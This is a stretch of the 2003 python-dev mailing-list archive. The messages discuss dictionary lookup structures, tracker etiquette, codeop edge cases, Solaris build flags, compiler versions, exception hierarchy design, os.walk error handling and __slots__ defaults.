From jack@performancedrivers.com  Mon May 12 07:16:57 2003
From: jack@performancedrivers.com (Jack Diederich)
Date: Mon, 12 May 2003 02:16:57 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>; from tim.one@comcast.net on Sun, May 11, 2003 at 09:47:33PM -0400
References: <20030505201416.GB17384@barsoom.org> <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>
Message-ID: <20030512021657.C951@localhost.localdomain>

On Sun, May 11, 2003 at 09:47:33PM -0400, Tim Peters wrote:
> [Agthorr]
> > An alternate optimization would be the additional of an immutable
> > dictionary type to the language, initialized from a mutable dictionary
> > type.  Upon creation, this dictionary would optimize itself, in a
> > manner similar to "gperf" program which creates (nearly) minimal
> > zero-collision hash tables.
>
> For symbol table apps, Bentley & Sedgewick rehabilitated the idea of ternary
> search trees a few years ago, and I think you'd enjoy reading their papers:
> 
>     http://www.cs.princeton.edu/~rs/strings/
> 
> In particular, they're faster than hashing in the failing-lookup case.

They nest well too.  And you can do some caching if the higher level trees
are unchaning (local scope can shortcut into builtins).

I have a pure-python ternary tree and a C w/python wrappers of ternary trees
lying around.  They were written with symbol tables is mind, I haven't touched
em since my presentation proposal on the topic [ternary trees in general,
replacing python symbol dict w/ t-trees as the closing example] was declined 
for the Portland OReilly thingy (bruised ego, sour grapes, et al).

Cut-n-paste from an off-list for this undying thread below.
Hettinger's idea of treaps is a good one.  A ternary-treap would also
be possible.

-jack

[Raymond]
> My thought is to use a treap.  The binary search side would scan the
> hash values while the heap part would organize from most frequent to
> least frequently accessed key.  It could even be dynamic and re-arrange
> the heap according to usage patterns.

[me]
treaps would probably be a better fit than ternary trees, espcially for
builtins for the reasons you mention.  A good default ordering would
go a long way.

[me, about ternary trees]
They nest nicely, a valid 'next' node can be another ternary tree, so
pseudo code for import would be

newmodule = __import__('mymodule')
# assume __module_symdict__ is the module's symbol table
__module_symdict__['mymodule.'] = newmodule.__module_symdict__

a lookup for 'mymodule.some_function' would happily run from the
current module's tree into the 'mymodule' tree.  The '.' seperator
would only remain speical from a user's point of view.

If symbols don't share leading characters, ternary trees are just
binary trees that require additional bookkeeping.  This is probably
the case, so ternary trees become less neat [even if they do make for
prettier pictures].


From drifty@alum.berkeley.edu  Mon May 12 09:09:12 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Mon, 12 May 2003 01:09:12 -0700
Subject: [Python-Dev] Random SF tracker ettiquete questions
Message-ID: <3EBF56A8.8090603@ocf.berkeley.edu>

First, do we care about closing RFEs?  I realized that Skip does not 
keep count of them in his weekly summary so I am not sure how much we 
care about them.  Should I waste my time wading through them to close them?

Second, when is it okay to reassign a tracker item to yourself or close 
an item that is assigned to another person?  I ask this because Fred has 
some patches assigned to him that I think I can close myself, but I 
don't want to step on his toes since they are assigned to him.

Third, when does someone warrant being mentioned in the ACKS.txt file? 
Only when they have done some significant body of work?  Or does 
committing even a one-line patch warrant inclusion?

-Brett

P.S.: Python got to #6 on SF's most active projects.  Maybe I am 
overdoing the comments on patches.  =)



From walter@livinglogic.de  Mon May 12 10:56:25 2003
From: walter@livinglogic.de (=?ISO-8859-1?Q?Walter_D=F6rwald?=)
Date: Mon, 12 May 2003 11:56:25 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>
Message-ID: <3EBF6FC9.3090805@livinglogic.de>

Tim Peters wrote:

> [...]
> For symbol table apps, Bentley & Sedgewick rehabilitated the idea of ternary
> search trees a few years ago, and I think you'd enjoy reading their papers:
> 
>     http://www.cs.princeton.edu/~rs/strings/
> 
> In particular, they're faster than hashing in the failing-lookup case.

The digital search tries mentioned in the article seem to use the
same fundamental approach as state machines, i.e. while traversing
the string, remember the string prefix that has already been
recognized. Digital search tries traverse the tree and the
memory is in the path that has been traversed. State machines
traverse a transition table and the memory is the current state.
Digital search tries seem to be easy to update, while state machine
are not.

Has anybody tried state machines for symbol tables in Python? The
size of the transition table might be a problem and any attempt
to reduce the size might kill performance in the inner loop.
Performancewise stringobject.c/string_hash() is hard to
beat (especially when the hash value is already cached).

Bye,
    Walter Dörwald



From mwh@python.net  Mon May 12 11:35:25 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 12 May 2003 11:35:25 +0100
Subject: [Python-Dev] Random SF tracker ettiquete questions
In-Reply-To: <3EBF56A8.8090603@ocf.berkeley.edu> ("Brett C."'s message of
 "Mon, 12 May 2003 01:09:12 -0700")
References: <3EBF56A8.8090603@ocf.berkeley.edu>
Message-ID: <2m3cjk78r6.fsf@starship.python.net>

"Brett C." <bac@OCF.Berkeley.EDU> writes:

> First, do we care about closing RFEs?  I realized that Skip does not
> keep count of them in his weekly summary so I am not sure how much we
> care about them.  Should I waste my time wading through them to close
> them?

I remember Martin pointing out that we should prioritize patches over
bug reports, as for a patch someone has actually put some work in.  By
this light RFEs are at the bottom of the pile.

> Second, when is it okay to reassign a tracker item to yourself or
> close an item that is assigned to another person?  I ask this because
> Fred has some patches assigned to him that I think I can close myself,
> but I don't want to step on his toes since they are assigned to him.

All doc bugs get assigned to Fred by default, IIRC.  These means he
probably doesn't feel too attached to them...

> Third, when does someone warrant being mentioned in the ACKS.txt file?
> Only when they have done some significant body of work?  Or does
> committing even a one-line patch warrant inclusion?

I err on the side of adding people.  It's a judgement call.  IMHO
pointing out a typo in the docs isn't sufficient, but just about
anything that involves thinking is.

> P.S.: Python got to #6 on SF's most active projects.  Maybe I am
> overdoing the comments on patches.  =)

Nonsense!

Cheers,
M.

-- 
  Good? Bad? Strap him into the IETF-approved witch-dunking
  apparatus immediately!                        -- NTK now, 21/07/2000


From fdrake@acm.org  Mon May 12 11:54:11 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Mon, 12 May 2003 06:54:11 -0400
Subject: [Python-Dev] Random SF tracker ettiquete questions
In-Reply-To: <3EBF56A8.8090603@ocf.berkeley.edu>
References: <3EBF56A8.8090603@ocf.berkeley.edu>
Message-ID: <16063.32083.158258.152293@grendel.zope.com>

Brett C. writes:
 > Second, when is it okay to reassign a tracker item to yourself or close 
 > an item that is assigned to another person?  I ask this because Fred has 
 > some patches assigned to him that I think I can close myself, but I 
 > don't want to step on his toes since they are assigned to him.

If you have the time to review them, please feel free to reassign to
yourself.  I'm really busy with other projects at the moment, so I'm
unlikely to get to them real soon.

Thanks!


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From guido@python.org  Mon May 12 12:58:19 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 12 May 2003 07:58:19 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: "Your message of Sun, 11 May 2003 22:38:25 EDT."
 <LNBBLJKPBEHFEDALKOLCCEGGEFAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCEGGEFAB.tim.one@comcast.net>
Message-ID: <200305121158.h4CBwKD29921@pcp02138704pcs.reston01.va.comcast.net>

> I like ValueError best when an input is of the right type but
> outside the defined domain of a function, like math.sqrt(-1.0) or
> chr(500).  Failing to find something feels more like a (possibly
> proper subclass of) LookupError to me.

Yeah, [].remove(42) raising ValueError is a bit weird.  It was put in
before we had the concept of LookupError, and the rationale for using
ValueError was that the *value* is not found -- can't use IndexError
because the value is chosen from a different set than the index, can't
use KeyError because lists don't have a concept of key.  In
retrospect, it would have been better to define a SearchError,
subclassing LookupError.

OTOH there's something to say for fewer errors, not more;
e.g. sometimes I wish AttributeError and TypeError were unified,
because AttributeError usually means that an object isn't of the
expected type.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon May 12 13:11:22 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 12 May 2003 08:11:22 -0400
Subject: [Python-Dev] Random SF tracker ettiquete questions
In-Reply-To: "Your message of Mon, 12 May 2003 01:09:12 PDT."
 <3EBF56A8.8090603@ocf.berkeley.edu>
References: <3EBF56A8.8090603@ocf.berkeley.edu>
Message-ID: <200305121211.h4CCBNK29988@pcp02138704pcs.reston01.va.comcast.net>

> First, do we care about closing RFEs?  I realized that Skip does not
> keep count of them in his weekly summary so I am not sure how much
> we care about them.  Should I waste my time wading through them to
> close them?

I don't think that's a waste of time.  It's good to keep track of how
much progress we make in any dimension.

> Second, when is it okay to reassign a tracker item to yourself or
> close an item that is assigned to another person?  I ask this
> because Fred has some patches assigned to him that I think I can
> close myself, but I don't want to step on his toes since they are
> assigned to him.

All doc issues are automatically assigned to Fred (maybe this needs to
be revised); I don't think he'll be offended if you take some work of
his chest.

> Third, when does someone warrant being mentioned in the ACKS.txt
> file? Only when they have done some significant body of work?  Or
> does committing even a one-line patch warrant inclusion?

I tend to add people to Misc/ACKS for any code contribution
whatsoever, including one-liners.

> -Brett
> 
> P.S.: Python got to #6 on SF's most active projects.  Maybe I am 
> overdoing the comments on patches.  =)

No, please keep it up. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake@acm.org  Mon May 12 14:47:27 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Mon, 12 May 2003 09:47:27 -0400
Subject: [Python-Dev] Random SF tracker ettiquete questions
In-Reply-To: <200305121211.h4CCBNK29988@pcp02138704pcs.reston01.va.comcast.net>
References: <3EBF56A8.8090603@ocf.berkeley.edu>
 <200305121211.h4CCBNK29988@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <16063.42479.84510.486834@grendel.zope.com>

Guido van Rossum writes:
 > All doc issues are automatically assigned to Fred (maybe this needs to
 > be revised); I don't think he'll be offended if you take some work of
 > his chest.

Is this still the case?  I'm fairly certain I changed that, given the
amount of time I haven't been able to spend over the past several
months.  (I'm pretty sure I actually changed that last year... I'd
check but the SF website is down.)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From pedronis@bluewin.ch  Mon May 12 15:48:01 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 12 May 2003 16:48:01 +0200
Subject: [Python-Dev] codeop: small details (Q); commit priv request
Message-ID: <5.2.1.1.0.20030512140727.02362ab0@localhost>


1)

Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
 >>> import codeop
 >>> codeop.compile_command("",symbol="eval")
Traceback (most recent call last):
   File "<stdin>", line 1, in ?
   File "s:\transit\py23\lib\codeop.py", line 129, in compile_command
     return _maybe_compile(_compile, source, filename, symbol)
   File "s:\transit\py23\lib\codeop.py", line 106, in _maybe_compile
     raise SyntaxError, err1
   File "<input>", line 1
     pass
        ^
SyntaxError: invalid syntax


the error is basically an artifact of the logic that enforces:

compile_command("",symbol="single") === compile_command("pass",symbol="single")

(this makes typing enter immediately after the prompt at a simulated shell 
a nop as expected)

I would expect

compile_command("",symbol="eval")

to return None, i.e. to simply signal an incomplete expression (that is 
what would happen if the code for "eval" case would avoid the cited logic).

2) symbol = "exec" is silently accepted but the documentation intentionally 
only refers to "exec" and "single" as valid values for symbol. Maybe a 
ValueError should be raised.

Context: I was working on improving Jython codeop compatibility with 
CPython codeop.

Btw, as considered here by Guido 
http://sourceforge.net/tracker/index.php?func=detail&aid=645404&group_id=5470&atid=305470
I would ask to have commit privileges for CPython

regards





From tino.lange@isg.de  Mon May 12 15:49:37 2003
From: tino.lange@isg.de (Tino Lange)
Date: Mon, 12 May 2003 16:49:37 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305092032.h49KW5B11937@pcp02138704pcs.reston01.va.comcast.net>
References: <200305092032.h49KW5B11937@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EBFB481.4070907@isg.de>

Hi!

It's still not clear to me after reading this thread:

Besides the optimizer - is it really possible to build a python.exe that 
*doesn't* depend on the .NET framework with the free download 
combination of ".NET 1.1" / "latest SDK".

Of course you can build it with the VC7.1 Pro, there's a 
framework-compiler and a standalone vc++-compiler included.

But also in the free download edition? I thought this is only the 
several framework compilers?

Thanks for giving me a hint.
Best regards

Tino




From barry@python.org  Mon May 12 16:15:14 2003
From: barry@python.org (Barry Warsaw)
Date: 12 May 2003 11:15:14 -0400
Subject: [Python-Dev] codeop: small details (Q); commit priv request
In-Reply-To: <5.2.1.1.0.20030512140727.02362ab0@localhost>
References: <5.2.1.1.0.20030512140727.02362ab0@localhost>
Message-ID: <1052752514.22883.16.camel@barry>

On Mon, 2003-05-12 at 10:48, Samuele Pedroni wrote:

> Btw, as considered here by Guido 
> http://sourceforge.net/tracker/index.php?func=detail&aid=645404&group_id=5470&atid=305470
> I would ask to have commit privileges for CPython

Done!
-Barry




From mwh@python.net  Mon May 12 16:22:22 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 12 May 2003 16:22:22 +0100
Subject: [Python-Dev] codeop: small details (Q); commit priv request
In-Reply-To: <5.2.1.1.0.20030512140727.02362ab0@localhost> (Samuele
 Pedroni's message of "Mon, 12 May 2003 16:48:01 +0200")
References: <5.2.1.1.0.20030512140727.02362ab0@localhost>
Message-ID: <2mvfwg5gwh.fsf@starship.python.net>

Samuele Pedroni <pedronis@bluewin.ch> writes:

> 1)
>
> Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
> Type "help", "copyright", "credits" or "license" for more information.
>  >>> import codeop
>  >>> codeop.compile_command("",symbol="eval")
> Traceback (most recent call last):
>    File "<stdin>", line 1, in ?
>    File "s:\transit\py23\lib\codeop.py", line 129, in compile_command
>      return _maybe_compile(_compile, source, filename, symbol)
>    File "s:\transit\py23\lib\codeop.py", line 106, in _maybe_compile
>      raise SyntaxError, err1
>    File "<input>", line 1
>      pass
>         ^
> SyntaxError: invalid syntax
>
>
> the error is basically an artifact of the logic that enforces:
>
> compile_command("",symbol="single") === compile_command("pass",symbol="single")
>
> (this makes typing enter immediately after the prompt at a simulated
> shell a nop as expected)
>
> I would expect
>
> compile_command("",symbol="eval")
>
> to return None, i.e. to simply signal an incomplete expression (that
> is what would happen if the code for "eval" case would avoid the cited
> logic).

OK, but I think you should preserve the existing behaviour for
symbol="single".

Cheers,
M.

-- 
  I also feel it essential to note, [...], that Description Logics,
  non-Monotonic Logics, Default Logics and Circumscription Logics
  can all collectively go suck a cow. Thank you.
              -- http://advogato.org/person/Johnath/diary.html?start=4


From harri.pasanen@trema.com  Mon May 12 17:13:36 2003
From: harri.pasanen@trema.com (Harri Pasanen)
Date: Mon, 12 May 2003 18:13:36 +0200
Subject: [Python-Dev] Python 2.3b1 _XOPEN_SOURCE value from configure.in
Message-ID: <200305121813.36383.harri.pasanen@trema.com>

Seems that Python 2.3b1 hardcodes the value of XOPEN_SOURCE to 600 on 
Solaris.

In configure in:
if test $define_xopen_source = yes
then
  AC_DEFINE(_XOPEN_SOURCE, 600, 
            Define to the level of X/Open that your system supports)

Now the correct value for Solaris 2.7 in our case is 500, which is 
defined in the system headers, and boost config picks up the correct 
value.

So when compiling boost-python, there are zillion warning messages 
about redefinition of  _XOPEN_SOURCE.

Is this a problem people are aware of, and is someone fixing it as I 
write, or is a volunteer needed?

-Harri


From pedronis@bluewin.ch  Mon May 12 17:31:13 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 12 May 2003 18:31:13 +0200
Subject: [Python-Dev] codeop: small details (Q); commit priv request
In-Reply-To: <1052752514.22883.16.camel@barry>
References: <5.2.1.1.0.20030512140727.02362ab0@localhost>
 <5.2.1.1.0.20030512140727.02362ab0@localhost>
Message-ID: <5.2.1.1.0.20030512183026.01cef8c8@localhost>

At 11:15 12.05.2003 -0400, Barry Warsaw wrote:
>On Mon, 2003-05-12 at 10:48, Samuele Pedroni wrote:
>
> > Btw, as considered here by Guido
> > 
> http://sourceforge.net/tracker/index.php?func=detail&aid=645404&group_id=5470&atid=305470
> > I would ask to have commit privileges for CPython
>
>Done!
>-Barry

Thanks. 



From pedronis@bluewin.ch  Mon May 12 17:34:21 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 12 May 2003 18:34:21 +0200
Subject: [Python-Dev] codeop: small details (Q); commit priv request
In-Reply-To: <2mvfwg5gwh.fsf@starship.python.net>
References: <5.2.1.1.0.20030512140727.02362ab0@localhost>
 <5.2.1.1.0.20030512140727.02362ab0@localhost>
Message-ID: <5.2.1.1.0.20030512183320.01d012c8@localhost>

At 16:22 12.05.2003 +0100, Michael Hudson wrote:

> >
> > I would expect
> >
> > compile_command("",symbol="eval")
> >
> > to return None, i.e. to simply signal an incomplete expression (that
> > is what would happen if the code for "eval" case would avoid the cited
> > logic).
>
>OK, but I think you should preserve the existing behaviour for
>symbol="single".

Of course, I didn't mean otherwise. I can prepare a patch and I have also a 
somehow beefed up test_codeop. 



From tim.one@comcast.net  Mon May 12 21:58:27 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 12 May 2003 16:58:27 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <3EBF6FC9.3090805@livinglogic.de>
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEIIFKAA.tim.one@comcast.net>

[Walter D=F6rwald]
> ...
> Has anybody tried state machines for symbol tables in Python?

Not that I know of.

> The size of the transition table might be a problem and any attempt
> to reduce the size might kill performance in the inner loop.
> Performancewise stringobject.c/string_hash() is hard to
> beat (especially when the hash value is already cached).

Which is why, if nobody ever did or ever does try alternative approac=
hes, I
would be neither surprised nor disappointed <0.9 wink>.




From martin@v.loewis.de  Mon May 12 22:04:06 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 12 May 2003 23:04:06 +0200
Subject: [Python-Dev] Python 2.3b1 _XOPEN_SOURCE value from configure.in
In-Reply-To: <200305121813.36383.harri.pasanen@trema.com>
References: <200305121813.36383.harri.pasanen@trema.com>
Message-ID: <m3issfg9mh.fsf@mira.informatik.hu-berlin.de>

Harri Pasanen <harri.pasanen@trema.com> writes:

> So when compiling boost-python, there are zillion warning messages 
> about redefinition of  _XOPEN_SOURCE.
[...]
> Is this a problem people are aware of, and is someone fixing it as I 
> write, or is a volunteer needed?

I'm not aware of this problem specifically, but of the problem in
general. I'd claim that this is a bug in Boost. Python.h should be the
first header file included, before any header file from the
application or the system, so it gets to define the value of
_XOPEN_SOURCE. This is documented in the extensions manual.

Of course, it would be sufficient to set it to a smaller value on
systems that support only older X/Open issues; I think I'd accept a
patch that changes this (if the patch is correct, of course).

Regards,
Martin



From barry@barrys-emacs.org  Mon May 12 22:37:35 2003
From: barry@barrys-emacs.org (Barry Scott)
Date: Mon, 12 May 2003 22:37:35 +0100
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <m3ptmr2q6h.fsf@mira.informatik.hu-berlin.de>
References: <3EBCABD0.7050700@lemburg.com>
 <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>
 <3EBCABD0.7050700@lemburg.com>
Message-ID: <5.1.1.6.0.20030512222353.022ade78@torment.chelsea.private>

Did I miss the answer to why bother to move to VC7?

As a C project I know of very little to recommend VC7 or VC7.1.
As a C++ developer I've decided that VC7 as little more then a broken
VC6. Maybe Jesse Lipcon (who works for MS now) has managed to
make VC7.1 more standards compatible for C++ work, which would
recommend it to C++ developers.

Note that wxPython claims that it will not compile correctly with VC7
unless you add a work around for a bug in the code generator.

	Barry




From nhodgson@bigpond.net.au  Mon May 12 22:36:00 2003
From: nhodgson@bigpond.net.au (Neil Hodgson)
Date: Tue, 13 May 2003 07:36:00 +1000
Subject: [Python-Dev] MS VC 7 offer
References: <200305092032.h49KW5B11937@pcp02138704pcs.reston01.va.comcast.net>
 <3EBFB481.4070907@isg.de>
Message-ID: <00c701c318ce$7b249330$3da48490@neil>

Tino Lange:

> Besides the optimizer - is it really possible to build a python.exe that
> *doesn't* depend on the .NET framework with the free download
> combination of ".NET 1.1" / "latest SDK".

   The C++ compiler in the free .NET SDK download can create executables
with no dependence on the .NET runtime. There is only a small set of headers
and libraries in the .NET SDK download but a full set is in the free
Platform SDK download. IIRC, the first public beta of .NET even included the
optimizer but that was swiftly removed.

   Neil



From logistix@cathoderaymission.net  Mon May 12 23:06:53 2003
From: logistix@cathoderaymission.net (logistix)
Date: Mon, 12 May 2003 18:06:53 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <5.1.1.6.0.20030512222353.022ade78@torment.chelsea.private>
Message-ID: <000001c318d2$cbf3b0d0$20bba8c0@XP>


> -----Original Message-----
> From: python-dev-admin@python.org 
> [mailto:python-dev-admin@python.org] On Behalf Of Barry Scott
> Sent: Monday, May 12, 2003 5:38 PM
> To: 'python-dev'
> Subject: Re: [Python-Dev] MS VC 7 offer
> 
> 
> Did I miss the answer to why bother to move to VC7?
> 




From logistix@cathoderaymission.net  Mon May 12 23:08:56 2003
From: logistix@cathoderaymission.net (logistix)
Date: Mon, 12 May 2003 18:08:56 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <5.1.1.6.0.20030512222353.022ade78@torment.chelsea.private>
Message-ID: <000101c318d3$1583c870$20bba8c0@XP>


> -----Original Message-----
> From: python-dev-admin@python.org 
> [mailto:python-dev-admin@python.org] On Behalf Of Barry Scott
> Sent: Monday, May 12, 2003 5:38 PM
> To: 'python-dev'
> Subject: Re: [Python-Dev] MS VC 7 offer
> 
> 
> Did I miss the answer to why bother to move to VC7?
> 

Here's one reason.  You can't buy VC6.0 anymore.  I can't find any
indication of an Official End-of-life on MS's site though.

http://msdn.microsoft.com/vstudio/previous/downgrade.aspx



From tdelaney@avaya.com  Tue May 13 01:00:00 2003
From: tdelaney@avaya.com (Delaney, Timothy C (Timothy))
Date: Tue, 13 May 2003 10:00:00 +1000
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
Message-ID: <338366A6D2E2CA4C9DAEAE652E12A1DE57F1E2@au3010avexu1.global.avaya.com>

> From: Guido van Rossum [mailto:guido@python.org]
>=20
> OTOH there's something to say for fewer errors, not more;
> e.g. sometimes I wish AttributeError and TypeError were unified,
> because AttributeError usually means that an object isn't of the
> expected type.

Hmm ... I was going to ask if there was any reason not to make =
AttributeError a subclass of TypeError, but that would mean that code =
like:

    try:
        ...
    except TypeError:
        ...

would also catch all AttributeErrors.

Maybe we should have a __future__ directive and phase it in starting in =
2.4?

I wouldn't suggest making AttributeError and TypeError be synonyms =
though ... I think it is useful to distinguish the situations.

I can't think of any case in *my* code where I would want to distinguish =
between a TypeError and an AttributeError - usually I end up having:

    try:
        ...
    except (TypeError, AttributeError):
        ...

Tim Delaney


From pje@telecommunity.com  Tue May 13 01:34:21 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Mon, 12 May 2003 20:34:21 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <338366A6D2E2CA4C9DAEAE652E12A1DE57F1E2@au3010avexu1.global
 .avaya.com>
Message-ID: <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>

At 10:00 AM 5/13/03 +1000, Delaney, Timothy C (Timothy) wrote:
>I can't think of any case in *my* code where I would want to distinguish 
>between a TypeError and an AttributeError - usually I end up having:
>
>     try:
>         ...
>     except (TypeError, AttributeError):
>         ...

How odd.  I was going to say the reverse; that I *always* want to 
distinguish between the two, because TypeError almost invariably is a 
programming error of some kind, while AttributeError is nearly always an 
error that I'm checking in order to have a fallback.  E.g.:

try:
    foo = thingy.foo
except AttributeError:
    # default case
else:
    foo()

However, if 'thingy.foo' were to raise any other kind of error, such as a 
TypeError, it'd probably mean that thingy had a broken 'foo' descriptor 
that I'd want to know about.



From guido@python.org  Tue May 13 02:44:41 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 12 May 2003 21:44:41 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: "Your message of Mon, 12 May 2003 20:34:21 EDT."
 <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>
References: <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>
Message-ID: <200305130144.h4D1ifq30620@pcp02138704pcs.reston01.va.comcast.net>

> How odd.  I was going to say the reverse; that I *always* want to 
> distinguish between the two, because TypeError almost invariably is a 
> programming error of some kind, while AttributeError is nearly always an 
> error that I'm checking in order to have a fallback.  E.g.:
> 
> try:
>     foo = thingy.foo
> except AttributeError:
>     # default case
> else:
>     foo()
> 
> However, if 'thingy.foo' were to raise any other kind of error, such as a 
> TypeError, it'd probably mean that thingy had a broken 'foo' descriptor 
> that I'd want to know about.

This sounds like a much more advanced use, typical to a certain style
of programming. Others would do this using hasattr() or three-argument
getattr(); some will argue that you should have a base class that
handles the default case so you don't need to handle that case
separately at all (though that may not always be possible, e.g. when
dealing with objects created by a 3rd party library).

Your example argues for allowing to distringuish between
AttributeError and TypeError, but doesn't convince me that they are
totally different beasts.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From pje@telecommunity.com  Tue May 13 04:02:24 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Mon, 12 May 2003 23:02:24 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <200305130144.h4D1ifq30620@pcp02138704pcs.reston01.va.comca
 st.net>
References: <"Your message of Mon, 12 May 2003 20:34:21 EDT." <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>
 <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>
Message-ID: <5.1.0.14.0.20030512224621.03ef8500@mail.telecommunity.com>

At 09:44 PM 5/12/03 -0400, Guido van Rossum wrote:

>This sounds like a much more advanced use, typical to a certain style
>of programming.

Framework programming, for maximal adaptability of third-party code, yes.


>Others would do this using hasattr() or three-argument
>getattr()

I use three-argument getattr() most of the time, actually.  However, 
doesn't 'getattr()' rely on catching AttributeError?  I just wanted my 
example to be explicit.


>Your example argues for allowing to distringuish between
>AttributeError and TypeError, but doesn't convince me that they are
>totally different beasts.

Sure.  My point is more that using exceptions to indicate failed lookups is 
a tricky business.

I almost wish there was a way to declare the "normal" exceptions raised by 
an operation; or perhaps to easily query where an exception was raised.

Nowadays, when designing interfaces that need to signal some kind of 
exceptional condition, I tend to want to have them return sentinel values 
rather than raise exceptions, in order to distinguish between "failed" and 
"broken".

I'm sure that this is an issue specific to framework programming and to 
large team-built systems, though, and not something that bothers the 
mythical "average developer" a bit.  :)



From tanzer@swing.co.at  Tue May 13 06:33:27 2003
From: tanzer@swing.co.at (Christian Tanzer)
Date: Tue, 13 May 2003 07:33:27 +0200
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: Your message of "Tue, 13 May 2003 10:00:00 +1000."
 <338366A6D2E2CA4C9DAEAE652E12A1DE57F1E2@au3010avexu1.global.avaya.com>
Message-ID: <E19FSPn-0003kn-00@tswings.swing.cluster>

"Delaney, Timothy C (Timothy)" <tdelaney@avaya.com> wrote:

> > From: Guido van Rossum [mailto:guido@python.org]
> >
> > OTOH there's something to say for fewer errors, not more;
> > e.g. sometimes I wish AttributeError and TypeError were unified,
> > because AttributeError usually means that an object isn't of the
> > expected type.
>
> Hmm ... I was going to ask if there was any reason not to make
> AttributeError a subclass of TypeError, but that would mean that code
> like:
>
>     try:
>         ...
>     except TypeError:
>         ...
>
> would also catch all AttributeErrors.
>
> Maybe we should have a __future__ directive and phase it in starting
> in 2.4?
>
> I wouldn't suggest making AttributeError and TypeError be synonyms
> though ... I think it is useful to distinguish the situations.
>
> I can't think of any case in *my* code where I would want to
> distinguish between a TypeError and an AttributeError - usually I end
> up having:
>
>     try:
>         ...
>     except (TypeError, AttributeError):
>         ...

More hmmm...

Just grepped over my source tree (1293 .py files, ~ 300000 lines):

- 45 occurrences of `except AttributeError` with no mention of
  `TypeError`

- 16 occurrences of `except TypeError` with no mention of
  `AttributeError`

- 3 occurrences of `except (AttributeError, TypeError)`

Works well enough for me.

Deriving both AttributeError and TypeError from a common base would
make sense to me. Merging them wouldn't.

PS: As that was my first post here, a short introduction. I'm a
    consultant using Python since early 1998. Since then the
    precentage of C/C++ use in my daily work steadily shrank.
    Nowadays, using C normally means generating C code from Python.

-- =

Christian Tanzer                                         tanzer@swing.co.=
at



From mrussell@verio.net  Tue May 13 10:52:43 2003
From: mrussell@verio.net (Mark Russell)
Date: Tue, 13 May 2003 10:52:43 +0100
Subject: [Python-Dev] os.walk() silently ignores errors
Message-ID: <E19FWSr-0000jb-00@straylight>

I've just noticed that os.walk() silently skips unreadable directories.  I 
think this is surprising behaviour, which at least should be documented (there 
is a comment explaining this is source, but nothing in the doc string).  Is it 
too late to add an optional callback argument to handle unreadable 
directories, so the caller could log them, raise an exception or whatever?  I 
think the default behaviour should still be to silently ignore them, but it 
would be nice to have a way to override it.

Mark Russell





From Raymond Hettinger" <python@rcn.com  Tue May 13 14:23:49 2003
From: Raymond Hettinger" <python@rcn.com (Raymond Hettinger)
Date: Tue, 13 May 2003 09:23:49 -0400
Subject: [Python-Dev] __slots__ and default values
Message-ID: <000601c31954$728e9500$32b02c81@oemcomputer>

Was there a reason that __slots__ makes initialized
variables read-only?  It would be useful to have
overridable default values (even if it entailed copying
them into an instance's slots):

class Pane(object):
    __slots__ = ('background', 'foreground', 'size', 'content')
    background = 'black'
    foreground = 'white'
    size = (80, 25)

p = Pane()
p.background = 'light blue'     # override the default
assert p.foreground == 'white' # other defaults still in-place



Raymond Hettinger
    




---------------------------

>>> class A(object):
 __slots__ = ('x',)
 x = 1
 
>>> class B(object):
 __slots__ = ('x',)

>>> A().x = 2
Traceback (most recent call last):
